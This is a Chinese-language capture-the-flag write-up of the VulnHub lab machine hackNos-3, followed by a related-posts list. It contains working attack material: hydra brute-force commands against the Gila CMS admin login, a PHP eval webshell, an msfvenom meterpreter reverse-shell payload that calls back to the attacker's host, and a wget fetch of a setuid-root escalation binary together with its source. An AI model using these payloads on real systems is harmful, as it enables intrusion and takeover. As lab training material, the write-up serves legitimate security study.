靶机Hacknos-3
kali ip:192.168.1.131
target ip:192.168.1.23
靶机下载:hackNos: Os-hackNos-3 ~ VulnHub
靶机目标:普通用户的user.txt和root用户的root.txt
步骤一:使用nmap进行网络扫描,发现目标192.168.1.23
为入侵目标靶机...
nmap -sn 192.168.1.0/24 nmap -sS -A -T5 192.168.1.202 -O
登录可以发现这样的页面
步骤二:使用目录扫描工具两种都可以,随便用一种就可以
1.
2.使用gobuster
工具对该网站进行目录扫描发现/scripts/
路径并访问...并无实际利用点...
这个我没有成功
./dirsearch.py -u http://192.168.1.23/gobuster dir -u http://192.168.1.202/ -w /home/flao/桌面/wordlist.list -x .php,.zip,.txt,.html
第一种扫描结果
第二种扫描结果这个是参考的,自己没有试成功
步骤三:访问这几个文件无果后回到站点主页面,发现 You need extra WebSec
在其站点后面添加路径/websec/
发现是一套CMS站点并扫描器后台登录页面/websec/admin
在title处发现Gila CMS
字样...并搜索发现为一套开源的CMS...
步骤四:使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞....文件包含漏洞需要登录后台,所以接下来的思路就是尝试弱口令爆破....
- Gila CMS < 1.11.1 - Local File Inclusion - Multiple webapps Exploit #文件包含漏洞
- Gila CMS 1.9.1 - Cross-Site Scripting - PHP webapps Exploit #XSS跨站脚本攻击
步骤五:使用cewl工具对其网站信息进行收集并制作成字典...
cewl http://192.168.1.202/websec/ > passwd.txt#密码破解 hydra -l contact@hacknos.com -P cewl.txt 192.168.1.23 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V
步骤六:和上一步作用类似 这里使用网站首页的邮箱作为是用户名,passwd.txt
作为密码开始使用Burpsuite对后台进行延迟暴力破解....得出:contact@hacknos.com:SecurityX
账号密码登录后的样子
步骤七:进入后台后尝试GetShell,在Content>>Media
处可以上传图片,Content>>File Manager
处可以编辑PHP文件....在Content>>File Manager
处进入tmp
目录编辑.htaccess
文件,将里面的内容全部删除点击Save
并进入tmp/media_thumb/
目录下上传一句话文件,访问并使用蚁剑进行链接...
先把.htaccess文件内容删除后再进行上传一句话文件
<?php @eval($_POST['z4pts']);?> http://192.168.1.98/websec/tmp/media_thumb/test.php
访问后的样子
步骤八:使用蚁剑进行链接并上传由msf生成的Shell文件...在kali中启动msfconsole
并进去到监听模式然后...打开浏览器访问webshell.php
进行shell反弹....
#MSF生成PHP木马 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.193 LPORT=1234 R > webshell.php chmod 777 webshell.php #使用蚁剑文件管理将生成的php上传上去 #kali中启动msfconsole接受Shell反弹 use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 192.168.1.193 #这里的ip是自己kali的ip set LPORT 1234 #监听的端口号
这里反弹shell是你打开监听模式后再打开浏览器访问上传的shell会自动监听
步骤九:在meterpreter
下输入shell
命令进入目标shell环境并执行以下命令进入bash
环境....
python -c 'import pty; pty.spawn("/bin/bash")'
步骤十:编译以下程序源码并上传到靶机目录下,给于777权限并执行获取高权限...并拿去Flag...
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>int main()
{setuid(0);setgid(0);system("/bin/bash");return 0;
}
#kali中的编译操作 root@kali:~# gcc exp.c -o exp luci11.c: In function ‘main’: luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]9 | system("/bin/bash");| ^~~~~~ root@kali:~# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8080 ...#目标靶机操作 www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ wget http://192.168.1.193:8080/exp -O exp <ia_thumb$ wget http://192.168.1.193:8080/exp -O exp --2022-02-22 12:48:35-- http://192.168.1.193:8080/exp Connecting to 192.168.1.193:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 16224 (16K) [application/octet-stream] Saving to: 'exp'exp 100%[===================>] 15.84K --.-KB/s in 0s 2022-02-22 12:48:35 (428 MB/s) - 'exp' saved [16224/16224]www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ ls ls assetsgila-logo.png exp flao.php shell.php www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ whoami whoami www-data www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ chmod 777 exp chmod 777 exp www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp <ml/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp Process 3771 detected root@hacknos:/var/www/html/websec/tmp/media_thumb# whoami whoami root root@hacknos:/var/www/html/websec/tmp/media_thumb# cd /root cd /root root@hacknos:/root# ls ls root.txt snap root@hacknos:/root# cat root.txt
###第二种提权方式:
- 切换到home目录下发现存在账户blackdevil用户
- 在/var/local/database文件中发现存在加密值
- 进行解密的到blackdevil用户密码进行su切换
- sudo -l查询sudo权限为ALL 直接sudo su执行得到root用户权限..
- 解密网站:https://www.spammimic.com/spreadsheet.php
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cd /home cd /home www-data@hacknos:/home$ ls ls blackdevil www-data@hacknos:/home$ cd /var/local cd /var/local/ www-data@hacknos:/var/local$ ls ls database www-data@hacknos:/var/local$ cat database cat database Expenses Software Licenses,$2.78 Maintenance,$68.87 Mortgage Interest,$70.35 Advertising,$9.78 Phone,$406.80 Insurance,$9.04 Opss;fackespreadsheet www-data@hacknos:/var/local$ su blackdevil su blackdevil Password: Security@x@blackdevil@hacknos:/var/local$ sudo -l sudo -l [sudo] password for blackdevil: Security@x@Matching Defaults entries for blackdevil on hacknos:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser blackdevil may run the following commands on hacknos:(ALL : ALL) ALL blackdevil@hacknos:/var/local$ sudo su sudo su root@hacknos:/var/local# whoami whoami root root@hacknos:/var/local#
###参考资料:
- 『VulnHub系列』hackNos: Os-hackNos-3-Walkthrough - 灰信网(软件开发博客聚合)
- VulnHub-hackNos: Os-hackNos-3-靶机通关复现 | CN-SEC 中文网
- vulnhub靶机渗透[Os-hackNos-3] | lUc1f3r11's blog
靶机Hacknos-3相关推荐
- Vulnhub靶机:HA_ NARAK
目录 介绍 主机发现 主机信息探测 网站探测 目录爆破 提示文件利用 hydra爆破web密码 webdav漏洞 手工-失败 MSF davtest cadaver 反弹shell 敏感信息收集-fl ...
- vulnhub靶机练习-Os-hackNos-1
今天带来的靶机是 vulnhub Os-hackNos-1 先看一下简介: 难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt 0.靶机简介: D ...
- 靶机Hacknos-2.1
靶机地址 https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/# 目标为 普通用户的user.txt和root用户的root.txt 第一步现 ...
- Vulnhub靶机:GEARS OF WAR_ EP#1
目录 介绍 信息收集 主机发现 主机信息探测 访问网站 测试 samba 安全 smbmap 访问默认共享 enum4linux 获取系统用户 smbclient获取文件 查看文件 SSH爆破 登录S ...
- vulnhub靶机 Os-ByteSec
vulnhub靶机 Os-ByteSec 靶机地址hackNos: Os-Bytesec ~ VulnHub 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 靶机网卡配置 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- HA: InfinityStones靶机渗透测试
文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- HA: Dhanush靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...
最新文章
- ASP.NET 应用程序生命周期概述
- 数据结构第一次作业——抽象数据类型
- wps右键新建里面没有word和excel_WPS竟然出过这么多实用工具?每个都免费无广告,简直相见恨晚...
- XPath 详解,总结
- jmeter之ip欺骗
- 利用Python爬虫采集mac电脑皮肤
- Web前端笔记(5)
- [ExtJS 6]Grid分页工具栏无效问题解决
- 用java编写一个学生类
- Android Studio第三十六期 - 模块化Activity管理Fragment
- uboot移植——命令体系
- python生成excel文件二维码_Python实现读取Excel表内容批量生成二维码
- 计算机网络 第七版-第七版第八章软件工程(含答案)
- 动态html函数的写法,如何将html div id的动态传递给js函数
- validate.js 插件表单校验
- zabbix_agentd_window端运行报错cannot connect to Service Manager: [0x00000005]
- EasyFlash 里的 EF_WRITE_GRAN
- java依赖什么意思,JavaEE中的依赖性——依赖查找
- 中南大学材料院matlab考试题,中南大学材料院matlab操作题集答案
- 【分享】面试官:简单表述怎么做接口测试
热门文章
- python游戏模块 - 26 小项目-坦克行动 / 大球吃小球
- 如何通过计算机共享打印机,电脑如何共享打印机?
- python代码测试健康指数计算器_[代码全屏查看]-BMI指数计算器
- 镇魂歌~Qt5字符串
- [导入]2006TVB年度大戏《汇通天下》全32集[DVD双语字幕]
- 武忠祥老师每日一题、考研题型总结
- 使c语言程序变成流程图的软件,c语言流程图生成器
- 从儒墨道思想联想到安全工作
- 【Automation License Manager】西门子软件的授权逻辑及一些兼容性问题
- esp8266使用128x128 ST7735屏幕像素偏移问题处理